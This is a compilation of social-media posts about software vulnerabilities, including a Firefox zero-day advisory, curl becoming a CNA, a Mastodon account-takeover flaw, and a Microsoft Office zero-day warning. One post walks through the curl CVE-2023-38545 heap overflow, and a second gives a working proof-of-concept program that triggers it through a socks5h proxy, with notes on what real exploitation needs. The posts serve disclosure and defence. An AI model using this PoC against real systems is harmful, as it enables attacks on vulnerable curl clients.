Mozilla Firefox exploited zero-day: Security Advisory 2024-51 Security Vulnerability fixed in Firefox 131.0.2, Firefox ESR 128.3.1, Firefox ESR 115.16.1
CVE-2024-9680 (9.8 critical) Use-after-free in Animation timeline

An attacker was able to achieve code execution in the content process by exploiting a use-after-free in Animation timelines. We have had reports of this vulnerability being exploited in the wild.

See related @BleepingComputer reporting: Mozilla fixes Firefox zero-day actively exploited in attacks

The Canadian Centre for Cyber Security (CCCS) has a useless Mozilla security advisory (AV24-576) which doesn't indicate that this is an actively exploited zero-day. What's the point in an advisory when it doesn't provide the biz?

#zeroday #vulnerability #firefox #mozilla #cve #CVE_2024_9680

OK #vulnerability nerds

With the current state of #NVD, there is a need to fill the gap right now. It's expected that anything new happening is going to take months or years, which is longer than the world can wait

Anchore has an open source project we're currently calling "NVD Data Overrides" (naming things is hard)
github.com/anchore/nvd-data-ov…

We're working on adding the same type of thing NVD used to do to the #CVE data. The data is licensed CC0, anyone can use it for anything.

The data repo currently has over 500 enriched IDs (there's a lot more to do, but this is how it starts).

If you're interested in this sort of thing please come help. The vulnerability world is now so big we need to cooperate the same way open source works, nobody can do this alone anymore

GitHub - anchore/nvd-data-overrides

Contribute to anchore/nvd-data-overrides development by creating an account on GitHub.

^GitHub

"Mastodon: Diebstahl beliebiger Identitäten im föderierten Kurznachrichtendienst" 😬

Die Versionen 3.5.17, 4.0.13, 4.1.13 und 4.2.5 beheben die Sicherheitslücke. 👇

heise.de/news/Mastodon-Diebsta…

#mastodon #security #vulnerability #schwachstelle #sicherheit

Mastodon: Diebstahl beliebiger Identitäten im föderierten Kurznachrichtendienst

In einem knappen Sicherheitshinweis lassen die Entwickler eine Bombe platzen: Angreifer können jeden beliebigen Account übernehmen und fälschen.

^{Dr. Christopher Kunz (heise online)}

curl is now a CVE Numbering Authority (CNA) assigning CVE IDs for all for all products made and managed by the curl project. This includes curl, libcurl, and trurl.

cve.org/Media/News/item/news/2…

#CVE #CNA #VulnerabilityManagement #Vulnerability #Cybersecurity

Critical flaw found in WordPress plugin used on over 300,000 websites.

Read more in my article on the Tripwire blog: tripwire.com/state-of-security…

#cybersecurity #wordpress #vulnerability

Critical flaw found in WordPress plugin used on over 300,000 websites

A WordPress plugin used on over 300,000 websites has been found to contain vulnerabilities that could allow hackers to seize control.

^{www.tripwire.com}

#XSF Announcement

Recently there was an incident via a so called #man_in_the_middle attack happened to an #XMPP #server.

To reduce the risk of such attacks in the future an early stage service called CertWatch has been published by our Community: certwatch.xmpp.net/

Many thanks to Stephen P. Weber (@singpolyma)!

Read two related blog posts:
blog.jmp.chat/b/certwatch/cert…

snikket.org/blog/on-the-jabber…

#Jabber #mitm #security #vulnerability #machine_in_the_middle #chat

Why did the #curl #CVE202338545 vulnerability hide from static analysis tools?

The main reason for this is the type of code structure in question. In general state engines are quite difficult for static analysis tools, since as the name implies the state of the various variables depend on runtime state changes.

The code attempts to determine whether it is safe to use the provided host name for remote resolution. Since the code does not function correctly with host names longer than 255 characters, it falls back to using “socks5://” protocol (local name resolution) if the host name is longer. When the name is too long, the code forces “local name resolution” by setting “socks5_resolve_local” variable to TRUE.

Unfortunately this “socks5_resolve_local” variable isn’t stored in the “socks_state” structure as it should have been. For each state “step” the initial value for the variable is determined with:

bool socks5_resolve_local =
(conn->socks_proxy.proxytype == CURLPROXY_SOCKS5) ? TRUE : FALSE;

The INIT state then set the “socks5_resolve_local” to TRUE if the host name is too long:

/* RFC1928 chapter 5 specifies max 255 chars for domain name in packet */
if(!socks5_resolve_local && hostname_len > 255) {
infof(data, "SOCKS5: server resolving disabled for hostnames of "
"length > 255 [actual len=%zu]", hostname_len);
socks5_resolve_local = TRUE;
}

But this check is *only* done in INIT state. When the state is anything else, the initial value is used.

Now, later CONNECT_RESOLVE_REMOTE state checks if remote name resolution should be used or not:

if(!socks5_resolve_local) {
if (… sx->hostname is literal IPv6 address …) {
… use ipv6 address direct …
}
else if (… sx->hostname is literal IPv4 address …) {
… use ipv4 address direct …
}
else {
socksreq[len++] = 3;
socksreq[len++] = (char) hostname_len; /* one byte address length */
memcpy(&socksreq[len], sx->hostname, hostname_len); /* w/o NULL */
len += hostname_len;
}
}
As “socks5_resolve_local” flag is FALSE for the excessively long hostname the “socksreq” heap buffer will be overflown by the memcpy call.

There is no obvious way for the static analysis tools to determine that “socks5_resolve_local” might be set incorrectly for some of the states. Runtime #fuzzing will find this flaw quite easily, but unfortunately no fuzzing was performed for this specific functionality.

#vulnerability #staticanalysis #infosec

Here’s a quick proof of concept to reproduce the #curl #CVE202338545 #heapoverflow #vulnerability. This PoC expects localhost to run a #socks5 proxy:

gcc -xc -fsanitize=address - -lcurl <<EOF
# include <curl/curl.h>
# include <string.h>
int main(void)
{
CURL *curl = curl_easy_init();
if(curl) {
char url[32768];
memcpy(url, "https://", 8);
memset(url + 8, 'A', sizeof(url) - 8 - 1);
url[sizeof(url) - 1] = '\0';
curl_easy_setopt(curl, CURLOPT_URL, url);
(void)curl_easy_perform(curl);
curl_easy_cleanup(curl);
}
return 0;
}
EOF
https_proxy=socks5h://127.0.0.1 ./a.out

Some comments:
• Application must use socks5h proxy to be vulnerable (it can be via proxy env variables or by explicitly settings the proxy options inside the app).
• Application must either fetch the attacker provided URL or follow redirects controlled by the attacker.
• Exploitation is made slightly more complicated due to this being a heap buffer overflow (many libc have built-in heap sanity checks). On modern systems with address space layout randomization (ASLR) an additional information leak is likely required for successful exploitation.
• Certain combinations of libcurl, platform and/or application options are not affected. See the advisory at curl.se/docs/CVE-2023-38545.ht… for more details.

#infosec

Here's a stark reminder that any #backdoor is a #vulnerability:

"China-based hackers used a stolen sign-in key" to hack into US government's #Microsoft email accounts.

That's why we at Tutanota fight for strong encryption - without any backdoor. 🔒

edition.cnn.com/2023/07/12/pol…

Hey people!

If you use #Microsoft #Office be extra careful when opening documents or files from unknown sources. On May 31st a #vulnerability was disclosed, that allows an attacker to execute code through MS Office via maliciously prepared documents. It's best to open only stuff which comes from people you know or implement the published mitigation strategies:

🇬🇧 EN:
msrc-blog.microsoft.com/2022/0…

🇩🇪 GER:
heise.de/news/Zero-Day-Luecke-…

Currently I am not aware of a security update, so be careful.

#itsec

Zero-Day-Lücke in MS Office: Microsoft gibt Empfehlungen

Microsoft gibt Handlungsempfehlungen gegen die Zero-Day-Schwachstelle in Office. Angreifer könnten diese zum Einschleusen von Schadcode missbrauchen.

^{Dirk Knop (heise online)}